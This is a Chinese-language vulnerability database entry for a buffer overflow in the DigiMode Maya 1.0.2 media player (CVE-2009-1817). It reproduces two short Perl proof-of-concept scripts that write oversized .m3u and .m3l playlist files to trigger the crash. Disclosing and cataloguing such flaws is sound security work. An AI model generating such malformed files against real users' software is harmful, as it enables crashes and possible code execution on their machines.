Digimode10 Maya 'm3u'和'm3l'畸形播放列表文件缓冲区溢出漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117770 漏洞类型 缓冲区溢出
发布时间 2009-05-14 更新时间 2009-06-01
CVE编号 CVE-2009-1817 CNNVD-ID CNNVD-200905-336
漏洞平台 Windows CVSS评分 9.3
|漏洞来源
https://www.exploit-db.com/exploits/8677
https://cxsecurity.com/issue/WLB-2009060075
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200905-336
|漏洞详情
DigiModeMaya是DigiMode开发的一款多媒体播放器。DigiModeMaya1.0.2版本中存在多个缓冲区溢出。远程攻击者可以借助一个畸形的(1).m3u或(2).m3lplaylist文件的中的超长字符串,执行任意代码。
|漏洞EXP
#####################################################################################################
#                    DigiMode Maya 1.0.2 (.M3U File) Local Buffer Overflow PoC
#                 Discovered by SirGod  -  www.mortal-team.net & www.h4cky0u.org
######################################################################################################
my $chars= "A" x 1337;
my $file="sirgod.m3u";
open(my $FILE, ">>$file") or die "Cannot open $file: $!";
print $FILE $chars;
close($FILE);
print "$file was created";
print "SirGod - www.mortal-team.net & www.h4cky0u.org";

#####################################################################################################
#                    DigiMode Maya 1.0.2 (.M3L File) Local Buffer Overflow PoC
#                 Discovered by SirGod  -  www.mortal-team.net & www.h4cky0u.org
######################################################################################################
my $chars= "A" x 1337;
my $file="sirgod.m3l";
open(my $FILE, ">>$file") or die "Cannot open $file: $!";
print $FILE $chars;
close($FILE);
print "$file was created";
print "SirGod - www.mortal-team.net & www.h4cky0u.org";

# milw0rm.com [2009-05-14]
|参考资料

来源:XF
名称:digimode-m3u-m3l-bo(50533)
链接:http://xforce.iss.net/xforce/xfdb/50533
来源:BID
名称:34960
链接:http://www.securityfocus.com/bid/34960
来源:MILW0RM
名称:8677
链接:http://www.milw0rm.com/exploits/8677